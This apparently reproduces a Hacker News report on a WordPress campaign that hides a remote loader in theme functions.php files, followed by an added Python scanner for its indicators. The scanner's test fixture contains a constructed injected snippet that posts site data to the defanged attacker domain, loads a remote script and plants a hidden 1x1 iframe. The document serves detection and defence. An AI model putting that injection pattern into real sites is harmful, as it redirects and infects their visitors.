
"The code inserted into "functions.php" incorporates references to Google Ads, likely in an attempt to evade detection. But, in reality, it functions as a remote loader by sending an HTTP POST request to the domain "brazilc[.]com," which, in turn, responds with a dynamic payload that includes two components - A JavaScript file hosted on a remote server ("porsasystem[.]com"), which, as of writing, has been referenced on 17 websites and contains code to perform site redirects"
"A piece of JavaScript code that creates a hidden, 1x1 pixel iframe, within which it injects code that mimics legitimate Cloudflare assets like "cdn-cgi/challenge-platform/scripts/jsd/main.js" - an API that's a core part of its bot detection and challenge platform. It's worth noting that the domain "porsasystem[.]com" has been flagged as part of a traffic distribution system (TDS) called Kongtuke (aka 404 TDS, Chaya_002, LandUpdate808, and TAG-124)."
A campaign targets WordPress sites by injecting malicious JavaScript into theme files (functions.php). The injected code references Google Ads but operates as a remote loader that issues an HTTP POST to brazilc[.]com. The response returns a dynamic payload that loads a remote script from porsasystem[.]com which performs site redirects and injects a hidden 1x1 iframe. The iframe content mimics Cloudflare challenge assets (cdn-cgi/challenge-platform/scripts/jsd/main.js) to evade detection. The porsasystem[.]com domain is associated with a traffic distribution system (Kongtuke/404 TDS/Chaya_002/LandUpdate808/TAG-124). The infection chain runs porsasystem[.]com/6m9x.js then porsasystem[.]com/js.php to redirect victims to ClickFix-s.
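The indicators in the report (the two domains, the 6m9x.js and js.php paths, the Cloudflare challenge-platform path, and the hidden 1x1 iframe) translate directly into a file scanner for WordPress theme code. The following is an added example, not code from The Hacker News or from the campaign: it walks a directory for functions.php files and flags lines that reference the reported indicators, plus a heuristic (a Google Ads mention alongside an outbound HTTP call in the same file) that mirrors the decoy-plus-loader pattern the report describes. The fixtures at the bottom are constructed for the test and are not samples of the real injection; the rule names and the heuristic thresholds are this example's own choices.

```python
import os
import re
import sys
from dataclasses import dataclass

# Indicators taken from the report above. They are written defanged ("[.]") in the
# report; refang() lets one rule match both the defanged and the live form in a file.
IOC_DOMAINS = ["brazilc.com", "porsasystem.com"]
IOC_PATHS = ["/6m9x.js", "/js.php"]  # the reported infection-chain URLs on porsasystem[.]com
CLOUDFLARE_MIMIC = "cdn-cgi/challenge-platform/scripts/jsd/main.js"

# A 1x1 or display:none iframe; Cloudflare injects its challenge script at the edge,
# so neither this path nor a hidden iframe belongs in a theme's functions.php.
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe[^>]*?(?:"
    r"width\s*=\s*['\"]?1(?:px)?(?!\d)[^>]*?height\s*=\s*['\"]?1(?:px)?(?!\d)"
    r"|width\s*:\s*1px[^>]*?height\s*:\s*1px"
    r"|display\s*:\s*none)",
    re.I,
)
# Heuristic (this example's own): the report says the loader is dressed up as Google Ads
# code but issues an HTTP POST, so a Google Ads mention plus an outbound call is suspicious.
GOOGLE_ADS_RE = re.compile(r"google\s*ads", re.I)
OUTBOUND_HTTP_RE = re.compile(
    r"\b(?:wp_remote_post|wp_remote_get|curl_init|curl_exec|file_get_contents\s*\(\s*['\"]https?://)",
    re.I,
)


def refang(s: str) -> str:
    return s.replace("[.]", ".")


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int  # 0 marks a whole-file (heuristic) finding
    excerpt: str


def scan_text(text: str) -> list:
    """Return a list of Finding objects for one file's contents (empty list if clean)."""
    findings = []
    saw_google_ads = saw_outbound = False
    for no, raw in enumerate(text.splitlines(), 1):
        line = refang(raw)
        low = line.lower()
        excerpt = line.strip()[:100]
        hit_domains = [d for d in IOC_DOMAINS if d in low]
        for d in hit_domains:
            findings.append(Finding(f"ioc_domain:{d}", no, excerpt))
        # The paths are only reported together with the domain; alone, /js.php is too generic.
        if hit_domains:
            for p in IOC_PATHS:
                if p in low:
                    findings.append(Finding(f"ioc_path:{p}", no, excerpt))
        if CLOUDFLARE_MIMIC in low:
            findings.append(Finding("cloudflare_mimic_path", no, excerpt))
        if HIDDEN_IFRAME_RE.search(line):
            findings.append(Finding("hidden_1x1_iframe", no, excerpt))
        saw_google_ads |= bool(GOOGLE_ADS_RE.search(line))
        saw_outbound |= bool(OUTBOUND_HTTP_RE.search(line))
    if saw_google_ads and saw_outbound:
        findings.append(Finding("google_ads_decoy_with_outbound_http", 0, "file-level heuristic"))
    return findings


def scan_theme_dir(root: str) -> dict:
    """Scan every functions.php under root; returns {path: [Finding, ...]} for files with hits."""
    results = {}
    for dirpath, _, files in os.walk(root):
        if "functions.php" in files:
            path = os.path.join(dirpath, "functions.php")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                results[path] = hits
    return results


# Constructed fixtures for the self-test (not taken from the campaign).
SAMPLE_INFECTED = r"""<?php
// Google Ads conversion helper (constructed decoy comment)
function ga_conv_helper() {
    $r = wp_remote_post('https://brazilc[.]com/ads/track', array('body' => array('u' => $_SERVER['HTTP_HOST'])));
    echo '<script src="https://porsasystem[.]com/6m9x.js"></script>';
    echo '<iframe src="/cdn-cgi/challenge-platform/scripts/jsd/main.js" width="1" height="1" style="display:none"></iframe>';
}
add_action('wp_footer', 'ga_conv_helper');
"""
SAMPLE_CLEAN = r"""<?php
// Theme setup
function mytheme_setup() { add_theme_support('title-tag'); }
add_action('after_setup_theme', 'mytheme_setup');
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: python scan_functions_php.py /path/to/wp-content/themes
        for path, hits in scan_theme_dir(sys.argv[1]).items():
            for f in hits:
                print(f"{path}:{f.line_no}: {f.rule}: {f.excerpt}")
    else:
        for f in scan_text(SAMPLE_INFECTED):
            print(f"line {f.line_no}: {f.rule}: {f.excerpt}")
```

Run it against wp-content/themes on a suspect host; a hit on any ioc_domain rule is a direct match for the reported indicators, while the iframe and Google Ads heuristics are weaker signals that warrant reading the flagged lines rather than acting on them alone. The defanged fixture also shows that refang() is what makes a copied-from-report indicator match the live string a compromised file actually contains.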
Read at The Hacker News